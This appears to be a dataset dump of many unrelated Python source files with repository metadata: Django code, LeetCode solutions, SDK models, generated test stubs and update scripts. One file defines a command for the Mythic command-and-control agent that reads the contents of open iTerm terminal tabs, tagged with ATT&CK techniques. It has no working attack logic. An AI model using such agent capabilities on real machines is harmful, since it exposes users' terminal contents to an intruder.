name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('onemg', models.CharField(unique=True, max_length=13)),
('ean', models.CharField(unique=True, max_length=13)),
('upc', models.CharField(unique=True, max_length=12)),
('jan', models.CharField(max_length=13, null=True)),
('gtin', models.CharField(max_length=14, null=True)),
('nsn', models.CharField(max_length=14, null=True)),
('isbn10', models.CharField(max_length=10, null=True)),
('isbn13', models.CharField(max_length=13, null=True)),
('asin', models.CharField(max_length=10, null=True)),
('brand', models.CharField(max_length=128, null=True)),
('manufacturer', models.CharField(max_length=128, null=True)),
('mpn', models.CharField(max_length=64, null=True)),
('part_number', models.CharField(max_length=64, null=True)),
('sku', models.CharField(max_length=64, null=True)),
('model_number', models.CharField(max_length=64, null=True)),
('length', models.FloatField(null=True)),
('width', models.FloatField(null=True)),
('height', models.FloatField(null=True)),
('weight', models.FloatField(null=True)),
('description', models.CharField(max_length=512, null=True)),
('image_url', models.CharField(max_length=512, null=True)),
('amazon_url', models.URLField(null=True)),
('created', models.DateTimeField(auto_now_add=True, null=True)),
],
),
migrations.AddField(
model_name='barcode',
name='product',
field=models.ForeignKey(to='products.Product'),
),
migrations.AddField(
model_name='barcode',
name='type',
field=models.ForeignKey(to='products.BarcodeType'),
),
migrations.AlterUniqueTogether(
name='barcode',
unique_together=set([('product', 'type')]),
),
]
|
[
"[email protected]"
] | |
ddc87bfca79fabe3d914696f58497118d2d0d193
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python/generated/test/test_com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.py
|
d51b3347b77c7b18680b18281fcd2bb012c5ead3
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 |
Apache-2.0
| 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null |
UTF-8
|
Python
| false | false | 1,359 |
py
|
# coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info import ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(unittest.TestCase):
"""ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(self):
"""Test ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
ee4b23bbf32042a37a0d791f5b2ca1db58e8570e
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2741/60666/264322.py
|
a8362f4be09e9d763b52af7aceca5c10738a7630
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 257 |
py
|
nums=eval(input())
if len(nums)<2:
    print(len(nums))
else:
count=1
temp=1
for i in range(len(nums)-1):
if nums[i]<nums[i+1]:
count+=1
else:
temp=max(count,temp)
count=1
print(max(count,temp))
|
[
"[email protected]"
] | |
17e6f75ed18e0677f37465f1e06fd694ac1f207c
|
7790e3a3f2de068fef343585ec856983591997a2
|
/employee/templatetags/custom_math.py
|
f84010231a266d25ecf80f4bd85b0e1e5c8705ff
|
[] |
no_license
|
mehdi1361/tadbir
|
ce702a9a02672826f0bf06e8d5cf0644efe31949
|
c0a67710099f713cf96930e25df708625de89a6f
|
refs/heads/master
| 2021-06-04T07:35:37.624372 | 2018-07-23T05:25:04 | 2018-07-23T05:25:04 | 148,870,028 | 0 | 0 | null | 2019-10-22T21:40:28 | 2018-09-15T04:40:26 |
HTML
|
UTF-8
|
Python
| false | false | 484 |
py
|
from django import template
from django.db.models import Sum
from bank.models import File
register = template.Library()
@register.simple_tag
def add(a, b):
return a + b
@register.simple_tag
def count_files(user):
files = File.objects.filter(employees__employee=user)
return files.count()
@register.simple_tag
def sum_main_deposit(user):
result = File.objects.filter(employees__employee=user).aggregate(Sum('main_deposit'))
return result['main_deposit__sum']
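# Hypothetical template usage added for illustration (the context variable and
# surrounding markup are assumptions, not taken from this project's templates):
#
#   {% load custom_math %}
#   Files assigned: {% count_files request.user %}
#   Total main deposit: {% sum_main_deposit request.user %}
#   {% add 2 3 %}  {# renders 5 #}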
|
[
"[email protected]"
] | |
14b450a72c93ad9b78cf7685fe19e4122eb15c24
|
add74ecbd87c711f1e10898f87ffd31bb39cc5d6
|
/xcp2k/classes/_mp21.py
|
562fa5609e8ddc81fe2febf073542f27d358c618
|
[] |
no_license
|
superstar54/xcp2k
|
82071e29613ccf58fc14e684154bb9392d00458b
|
e8afae2ccb4b777ddd3731fe99f451b56d416a83
|
refs/heads/master
| 2021-11-11T21:17:30.292500 | 2021-11-06T06:31:20 | 2021-11-06T06:31:20 | 62,589,715 | 8 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 514 |
py
|
from xcp2k.inputsection import InputSection
from xcp2k.classes._mp2_info1 import _mp2_info1
class _mp21(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Section_parameters = None
self.Method = None
self.Big_send = None
self.MP2_INFO = _mp2_info1()
self._name = "MP2"
self._keywords = {'Method': 'METHOD', 'Big_send': 'BIG_SEND'}
self._subsections = {'MP2_INFO': 'MP2_INFO'}
self._attributes = ['Section_parameters']
|
[
"[email protected]"
] | |
4d23735583d49ed6fba1925bf636572e5d146be5
|
2f2e9cd97d65751757ae0a92e8bb882f3cbc5b5b
|
/121.买卖股票的最佳时机.py
|
7cd0e5ce63fc4da08187b59ea4f973e49037b644
|
[] |
no_license
|
mqinbin/python_leetcode
|
77f0a75eb29f8d2f9a789958e0120a7df4d0d0d3
|
73e0c81867f38fdf4051d8f58d0d3dc245be081e
|
refs/heads/main
| 2023-03-10T18:27:36.421262 | 2021-02-25T07:24:10 | 2021-02-25T07:24:10 | 314,410,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 463 |
py
|
#
# @lc app=leetcode.cn id=121 lang=python3
#
# [121] Best Time to Buy and Sell Stock
#
# @lc code=start
from typing import List  # needed so the List[int] annotation resolves outside the LeetCode environment
class Solution:
def maxProfit(self, prices: List[int]) -> int:
if not prices:
return 0
min_price = prices[0]
max_profit = 0
for i in range(1, len(prices)):
max_profit = max(prices[i] - min_price ,max_profit)
min_price = min(min_price, prices[i])
return max_profit
# @lc code=end
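# Usage sketch added for illustration (not part of the original submission):
# buy at 1 and sell at 6 in the first example for a profit of 5; a strictly
# falling price list yields 0.
if __name__ == '__main__':
    assert Solution().maxProfit([7, 1, 5, 3, 6, 4]) == 5
    assert Solution().maxProfit([7, 6, 4, 3, 1]) == 0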
|
[
"[email protected]"
] | |
147b3bc0148ddc69e31304519e65c37ad3c790e6
|
80de5ac86ce85b5aa93788d5d2325d88b87b47f7
|
/cf/1334/c.py
|
0d9603f1d8a8e97a68d5e3f095f080f1f5405a4e
|
[] |
no_license
|
ethicalrushi/cp
|
9a46744d647053fd3d2eaffc52888ec3c190f348
|
c881d912b4f77acfde6ac2ded0dc9e0e4ecce1c1
|
refs/heads/master
| 2022-04-24T07:54:05.350193 | 2020-04-27T20:27:31 | 2020-04-27T20:27:31 | 257,911,320 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,169 |
py
|
t = int(input())
for _ in range(t):
n = int(input())
a =[]
for i in range(n):
u, v = [int(x) for x in input().strip().split()]
a.append([u,v])
if n==1:
res=a[0]
else:
mn = 10**10
si = None
for i in range(1,n):
if a[i][0]>a[i-1][1]:
diff = a[i-1][1]
else:
diff = a[i][0]
if diff<mn:
mn = diff
si = i
if a[0][0]>a[-1][1]:
diff = a[-1][1]
else:
diff = a[0][0]
if diff<mn:
mn = diff
si = 0
# print(si)
if si is None:
res = min(a[i][0] for i in range(n))
else:
# res=0
res=a[si][0]
ct=1
prev_i=si
i = si+1
if i==n:
i=0
while ct<n:
# print(i, prev_i, res)
res+=max(0,a[i][0]-a[prev_i][1])
prev_i = i
i+=1
if i==n:
i=0
ct+=1
print(res)
|
[
"[email protected]"
] | |
ccf640a6f3089b61899c512ea864d117a27d00e3
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/a7WiKcyrTtggTym3f_11.py
|
38c97ae03767b14cd4f73e59493d45390792e3c0
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
"""
Create a function that takes two numbers as arguments and return the LCM of
the two numbers.
### Examples
lcm(3, 5) ➞ 15
lcm(14, 28) ➞ 28
lcm(4, 6) ➞ 12
### Notes
* Don't forget to return the result.
* You may want to use the GCD function to make this a little easier.
* LCM stands for least common multiple, the smallest multiple of both integers.
"""
def lcm(a, b):
m = max(a,b)
while True:
if m%a==0 and m%b==0:
return m
m += 1
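# A sketch of the GCD-based shortcut hinted at in the notes above (added here,
# not part of the original solution): a*b == gcd(a, b) * lcm(a, b), so dividing
# the product by the GCD gives the LCM directly.
from math import gcd
def lcm_via_gcd(a, b):
    # integer floor division keeps the result an int for positive integers a, b
    return a * b // gcd(a, b)
# lcm_via_gcd(3, 5) -> 15, lcm_via_gcd(14, 28) -> 28, lcm_via_gcd(4, 6) -> 12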
|
[
"[email protected]"
] | |
a9151a391b64c038d80fc25c24e8ae9bcc938c36
|
927fc31a0144c308a5c8d6dbe46ba8f2728276c9
|
/tasks/final_tasks/file_handling/2.count_word_in_file.py
|
7ad9f89f0c38383b2a89b17194e5f946ad3c11d8
|
[] |
no_license
|
ChandraSiva11/sony-presamplecode
|
b3ee1ba599ec90e357a4b3a656f7a00ced1e8ad3
|
393826039e5db8a448fa4e7736b2199c30f5ed24
|
refs/heads/master
| 2023-01-14T00:09:19.185822 | 2020-11-23T02:07:00 | 2020-11-23T02:07:00 | 299,527,171 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 268 |
py
|
# Python Program to Count the Number of Words in a Text File
def main():
num_words = 0
with open('text_doc.txt', 'r') as f:
for line in f:
words = line.split()
num_words += len(words)
print('Number of words', num_words)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
dc518d3adbaa5570a85345dacbb2b97213280b09
|
eb35535691c4153ba2a52774f0e40468dfc6383d
|
/hash_table/uncommon_words.py
|
849d39c6b50e9e3e7e62e2067fc6a68f1b0c2178
|
[] |
no_license
|
BJV-git/leetcode
|
1772cca2e75695b3407bed21af888a006de2e4f3
|
dac001f7065c3c5b210024d1d975b01fb6d78805
|
refs/heads/master
| 2020-04-30T19:04:12.837450 | 2019-03-21T21:56:24 | 2019-03-21T21:56:24 | 177,027,662 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 253 |
py
|
def uncommon_words(A,B):
A=A.split(' ')
B=B.split(' ')
res=[]
d={}
for i in A:
d[i] = d.get(i,0)+1
for i in B:
d[i] = d.get(i,0)+1
for i in d:
if d[i]==1:
res.append(i)
return res
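# Example added for illustration (not part of the original file): words that
# appear exactly once across both sentences are returned, in first-seen order.
if __name__ == '__main__':
    print(uncommon_words("this apple is sweet", "this apple is sour"))  # ['sweet', 'sour']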
|
[
"[email protected]"
] | |
244746f59dab7356af77d6b088d09be0109e7eea
|
5e76a420178dcb9008d6e4c12543ad0e3a50c289
|
/python/104.py
|
188ebec7d7866ddc2ac4ab6f887b025327467442
|
[] |
no_license
|
LichAmnesia/LeetCode
|
da6b3e883d542fbb3cae698a61750bd2c99658fe
|
e890bd480de93418ce10867085b52137be2caa7a
|
refs/heads/master
| 2020-12-25T14:22:58.125158 | 2017-07-18T06:44:53 | 2017-07-18T06:44:53 | 67,002,242 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 596 |
py
|
# -*- coding: utf-8 -*-
# @Author: Lich_Amnesia
# @Email: [email protected]
# @Date: 2016-09-18 17:38:27
# @Last Modified time: 2016-09-18 17:41:20
# @FileName: 104.py
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def maxDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root is None:
return 0
return max(self.maxDepth(root.left), self.maxDepth(root.right)) + 1
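# Usage sketch added for illustration (not part of the original submission):
# a minimal TreeNode matching the commented stub above, plus the classic
# [3,9,20,null,null,15,7] tree, whose depth is 3.
class TreeNode(object):
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
if __name__ == '__main__':
    root = TreeNode(3)
    root.left = TreeNode(9)
    root.right = TreeNode(20)
    root.right.left = TreeNode(15)
    root.right.right = TreeNode(7)
    assert Solution().maxDepth(root) == 3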
|
[
"[email protected]"
] | |
1d898f4d7db5808af12b3e9bd413033060f8403f
|
dfaf6f7ac83185c361c81e2e1efc09081bd9c891
|
/k8sdeployment/k8sstat/python/kubernetes/test/test_v1_local_object_reference.py
|
db02de623a1ffb63d799a47e9d655bb2206d76b9
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
JeffYFHuang/gpuaccounting
|
d754efac2dffe108b591ea8722c831d979b68cda
|
2c63a63c571240561725847daf1a7f23f67e2088
|
refs/heads/master
| 2022-08-09T03:10:28.185083 | 2022-07-20T00:50:06 | 2022-07-20T00:50:06 | 245,053,008 | 0 | 0 |
MIT
| 2021-03-25T23:44:50 | 2020-03-05T02:44:15 |
JavaScript
|
UTF-8
|
Python
| false | false | 994 |
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import kubernetes.client
from kubernetes.client.models.v1_local_object_reference import V1LocalObjectReference # noqa: E501
from kubernetes.client.rest import ApiException
class TestV1LocalObjectReference(unittest.TestCase):
"""V1LocalObjectReference unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1LocalObjectReference(self):
"""Test V1LocalObjectReference"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes.client.models.v1_local_object_reference.V1LocalObjectReference() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
d301667e9da5f7d349fdf435dc6c5bdd2dd9d67e
|
46bd3e3ba590785cbffed5f044e69f1f9bafbce5
|
/env/lib/python3.8/site-packages/pip/_vendor/pep517/envbuild.py
|
7e6160fc539bc7bd382d6a660739256889eb380f
|
[] |
no_license
|
adamkluk/casper-getstarted
|
a6a6263f1547354de0e49ba2f1d57049a5fdec2b
|
01e846621b33f54ed3ec9b369e9de3872a97780d
|
refs/heads/master
| 2023-08-13T11:04:05.778228 | 2021-09-19T22:56:59 | 2021-09-19T22:56:59 | 408,036,193 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:2dc493d0c01299c40d2ce16a0cfc43a12d648e4825c7c17a784868049f835a48
size 6112
|
[
"[email protected]"
] | |
7be171b3c6ccd20d4e7c354d4e4620d1a88c649d
|
fa1faa5c480ba249fbec18c0fb79b696d6b4bdf9
|
/4 - Arrays/RemoveKDigits.py
|
2c3dd044de47a9f8f777661c108947dbbc7b6b7f
|
[] |
no_license
|
AbhiniveshP/CodeBreakersCode
|
10dad44c82be352d7e984ba6b7296a7324f01713
|
7dabfe9392d74ec65a5811271b5b0845c3667848
|
refs/heads/master
| 2022-11-14T11:58:24.364934 | 2020-07-11T22:34:04 | 2020-07-11T22:34:04 | 268,859,697 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,180 |
py
|
class Solution:
# Time: O(N) --> a max of double visit
# Space: O(N)
def removeKdigits(self, num: str, k: int) -> str:
stack = []
        # before pushing a digit, pop larger stack tops so the stack stays monotonically non-decreasing; only pop while k > 0 and the stack is not empty
for i in range(len(num)):
currentNumber = int(num[i])
while (len(stack) > 0 and k > 0 and currentNumber < stack[-1]):
stack.pop()
k -= 1
stack.append(currentNumber)
        # the stack is non-decreasing, so any remaining removals can simply come off the end until k reaches 0
while (k > 0):
stack.pop()
k -= 1
# remove all leading zeros
cursor = 0
while (cursor < len(stack)):
if (stack[cursor] != 0):
break
cursor += 1
stack = stack[cursor:]
# edge case
if (len(stack) == 0):
return '0'
# now join the stack again
return ''.join([str(n) for n in stack])
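# Checks added for illustration (not part of the original submission); these are
# the canonical examples for the "Remove K Digits" problem.
if __name__ == '__main__':
    s = Solution()
    assert s.removeKdigits("1432219", 3) == "1219"
    assert s.removeKdigits("10200", 1) == "200"
    assert s.removeKdigits("10", 2) == "0"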
|
[
"[email protected]"
] | |
20900db7b1b8044e1bf0b27b91907868005a426c
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayInsSceneSellerActivitySignModel.py
|
4ef2bcff18867f0f8ba427a6a7c71a574c386b9c
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 2,623 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsSceneSellerActivitySignModel(object):
def __init__(self):
self._biz_data = None
self._channel_account_id = None
self._channel_account_type = None
self._sp_code = None
@property
def biz_data(self):
return self._biz_data
@biz_data.setter
def biz_data(self, value):
self._biz_data = value
@property
def channel_account_id(self):
return self._channel_account_id
@channel_account_id.setter
def channel_account_id(self, value):
self._channel_account_id = value
@property
def channel_account_type(self):
return self._channel_account_type
@channel_account_type.setter
def channel_account_type(self, value):
self._channel_account_type = value
@property
def sp_code(self):
return self._sp_code
@sp_code.setter
def sp_code(self, value):
self._sp_code = value
def to_alipay_dict(self):
params = dict()
if self.biz_data:
if hasattr(self.biz_data, 'to_alipay_dict'):
params['biz_data'] = self.biz_data.to_alipay_dict()
else:
params['biz_data'] = self.biz_data
if self.channel_account_id:
if hasattr(self.channel_account_id, 'to_alipay_dict'):
params['channel_account_id'] = self.channel_account_id.to_alipay_dict()
else:
params['channel_account_id'] = self.channel_account_id
if self.channel_account_type:
if hasattr(self.channel_account_type, 'to_alipay_dict'):
params['channel_account_type'] = self.channel_account_type.to_alipay_dict()
else:
params['channel_account_type'] = self.channel_account_type
if self.sp_code:
if hasattr(self.sp_code, 'to_alipay_dict'):
params['sp_code'] = self.sp_code.to_alipay_dict()
else:
params['sp_code'] = self.sp_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsSceneSellerActivitySignModel()
if 'biz_data' in d:
o.biz_data = d['biz_data']
if 'channel_account_id' in d:
o.channel_account_id = d['channel_account_id']
if 'channel_account_type' in d:
o.channel_account_type = d['channel_account_type']
if 'sp_code' in d:
o.sp_code = d['sp_code']
return o
|
[
"[email protected]"
] | |
d6e1af3c1f70472c05f440c578e0bb66519b95d3
|
205d581673e3960c99e6b8fe1475efb661421cb3
|
/bikeshed/update/main.py
|
1be2b76b3f73f81060b4b4fa57d6141ebd24f5e6
|
[
"CC0-1.0"
] |
permissive
|
TBBle/bikeshed
|
08f9137f7a561d154720297b76ced061cdd6a04a
|
5834a15f311a639c0b59ff2edbf3a060391d15ff
|
refs/heads/master
| 2021-01-12T18:33:43.213471 | 2017-09-29T20:56:24 | 2017-09-29T20:56:24 | 81,327,888 | 0 | 0 | null | 2017-02-08T12:30:22 | 2017-02-08T12:30:21 | null |
UTF-8
|
Python
| false | false | 3,886 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division, unicode_literals
import os
from . import updateCrossRefs
from . import updateBiblio
from . import updateCanIUse
from . import updateLinkDefaults
from . import updateTestSuites
from . import updateLanguages
from . import manifest
from .. import config
from ..messages import *
def update(anchors=False, biblio=False, caniuse=False, linkDefaults=False, testSuites=False, languages=False, path=None, dryRun=False, force=False):
if path is None:
path = config.scriptPath("spec-data")
# Update via manifest by default, falling back to a full update only if failed or forced.
if not force:
success = manifest.updateByManifest(path=path, dryRun=dryRun)
if not success:
say("Falling back to a manual update...")
force = True
if force:
# If all are False, update everything
updateAnyway = not (anchors or biblio or caniuse or linkDefaults or testSuites or languages)
if anchors or updateAnyway:
updateCrossRefs.update(path=path, dryRun=dryRun)
if biblio or updateAnyway:
updateBiblio.update(path=path, dryRun=dryRun)
if caniuse or updateAnyway:
updateCanIUse.update(path=path, dryRun=dryRun)
if linkDefaults or updateAnyway:
updateLinkDefaults.update(path=path, dryRun=dryRun)
if testSuites or updateAnyway:
updateTestSuites.update(path=path, dryRun=dryRun)
if languages or updateAnyway:
updateLanguages.update(path=path, dryRun=dryRun)
manifest.createManifest(path=path, dryRun=dryRun)
def fixupDataFiles():
'''
Checks the readonly/ version is more recent than your current mutable data files.
This happens if I changed the datafile format and shipped updated files as a result;
using the legacy files with the new code is quite bad!
'''
try:
localVersion = int(open(localPath("version.txt"), 'r').read())
except IOError:
localVersion = None
try:
remoteVersion = int(open(remotePath("version.txt"), 'r').read())
except IOError, err:
warn("Couldn't check the datafile version. Bikeshed may be unstable.\n{0}", err)
return
if localVersion == remoteVersion:
# Cool
return
# If versions don't match, either the remote versions have been updated
# (and we should switch you to them, because formats may have changed),
# or you're using a historical version of Bikeshed (ditto).
try:
for filename in os.listdir(remotePath()):
copyanything(remotePath(filename), localPath(filename))
except Exception, err:
warn("Couldn't update datafiles from cache. Bikeshed may be unstable.\n{0}", err)
return
def updateReadonlyDataFiles():
'''
Like fixupDataFiles(), but in the opposite direction --
copies all my current mutable data files into the readonly directory.
This is a debugging tool to help me quickly update the built-in data files,
and will not be called as part of normal operation.
'''
try:
for filename in os.listdir(localPath()):
if filename.startswith("readonly"):
continue
copyanything(localPath(filename), remotePath(filename))
except Exception, err:
warn("Error copying over the datafiles:\n{0}", err)
return
def copyanything(src, dst):
import shutil
import errno
try:
shutil.rmtree(dst, ignore_errors=True)
shutil.copytree(src, dst)
except OSError as exc:
if exc.errno in [errno.ENOTDIR, errno.EINVAL]:
shutil.copy(src, dst)
else:
raise
def localPath(*segs):
return config.scriptPath("spec-data", *segs)
def remotePath(*segs):
return config.scriptPath("spec-data", "readonly", *segs)
|
[
"[email protected]"
] | |
3183747cd1835046d97a500fd56fc5a714d8f69c
|
f90a30cfafc5d786a3dc269f3ca48dce3fc59028
|
/Payload_Types/apfell/mythic/agent_functions/iterm.py
|
94b35b48c3156d56770b68fba7a567e64efb0415
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
NotoriousRebel/Mythic
|
93026df4a829b7b88de814e805fdce0ab19f3ab9
|
4576654af4025b124edb88f9cf9d0821f0b73070
|
refs/heads/master
| 2022-12-03T01:19:20.868900 | 2020-08-18T03:48:55 | 2020-08-18T03:48:55 | 288,780,757 | 1 | 0 |
NOASSERTION
| 2020-08-19T16:20:19 | 2020-08-19T16:20:18 | null |
UTF-8
|
Python
| false | false | 920 |
py
|
from CommandBase import *
import json
class ITermArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {}
async def parse_arguments(self):
pass
class ITermCommand(CommandBase):
cmd = "iTerm"
needs_admin = False
help_cmd = "iTerm"
description = "Read the contents of all open iTerm tabs if iTerms is open, otherwise just inform the operator that it's not currently running"
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
attackmapping = ["T1139", "T1056"]
argument_class = ITermArguments
async def create_tasking(self, task: MythicTask) -> MythicTask:
return task
async def process_response(self, response: AgentResponse):
pass
|
[
"[email protected]"
] | |
62f15e21cc7da0172f76ec0118796903115796ca
|
4944541b0cd0fa48a01581ffce5e7ce16f5cf8d7
|
/src/Backend/MbkExam/Notification/serializers.py
|
a64b1c49829f6af25ac8f32051e5c5e42e2348cb
|
[] |
no_license
|
aballah-chamakh/the_exam
|
49a5b5c9d28c61b2283f2d42d2b2fb771dd48bf4
|
dbbbdc7a955ca61572f26430a7788407eaf0c632
|
refs/heads/main
| 2023-03-28T13:19:18.148630 | 2021-04-03T22:12:51 | 2021-04-03T22:12:51 | 354,404,833 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 912 |
py
|
from rest_framework import serializers
from .models import AdminNotification,StudentNotification
class AdminNotificationSerializer(serializers.ModelSerializer):
student_username = serializers.CharField(source='student.user.username')
student_img = serializers.CharField(source="student.image.url")
student_slug = serializers.SlugField(source="student.slug")
student_email = serializers.CharField(source="student.user.email")
class Meta :
model = AdminNotification
fields = ('student_email','student_img','student_username',"student_slug",'event_type','event_msg','event_slug','datetime','viewed')
class StudentNotificationSerializer(serializers.ModelSerializer):
student_slug = serializers.SlugField(source="student.slug")
class Meta :
model = StudentNotification
fields = ('student_slug','event_type','event_msg','event_slug','datetime','viewed')
|
[
"[email protected]"
] | |
4c800d767661ee69f80d462a929fd68be4f8b58f
|
a39dbda2d9f93a126ffb189ec51a63eb82321d64
|
/mongoengine/queryset/__init__.py
|
026a7acdd533719065dcc1c7c1955565b13d6f6f
|
[
"MIT"
] |
permissive
|
closeio/mongoengine
|
6e22ec67d991ea34c6fc96e9b29a9cbfa945132b
|
b083932b755a9a64f930a4a98b0129f40f861abe
|
refs/heads/master
| 2023-04-30T04:04:52.763382 | 2023-04-20T07:13:41 | 2023-04-20T07:13:41 | 5,533,627 | 21 | 5 |
MIT
| 2023-04-20T07:13:42 | 2012-08-23T23:02:20 |
Python
|
UTF-8
|
Python
| false | false | 525 |
py
|
from mongoengine.errors import (DoesNotExist, MultipleObjectsReturned,
InvalidQueryError, OperationError,
NotUniqueError)
from mongoengine.queryset.field_list import *
from mongoengine.queryset.manager import *
from mongoengine.queryset.queryset import *
from mongoengine.queryset.transform import *
from mongoengine.queryset.visitor import *
__all__ = (field_list.__all__ + manager.__all__ + queryset.__all__ +
transform.__all__ + visitor.__all__)
|
[
"[email protected]"
] | |
da0f752f37d66f5033607317460320c51b7d99e2
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/ec2_write_f/vpc_create.py
|
72acec139ecc5774ba67c1d8199de44fc116c546
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 588 |
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
delete-vpc : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-vpc.html
describe-vpcs : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-vpcs.html
"""
write_parameter("ec2", "create-vpc")
|
[
"[email protected]"
] |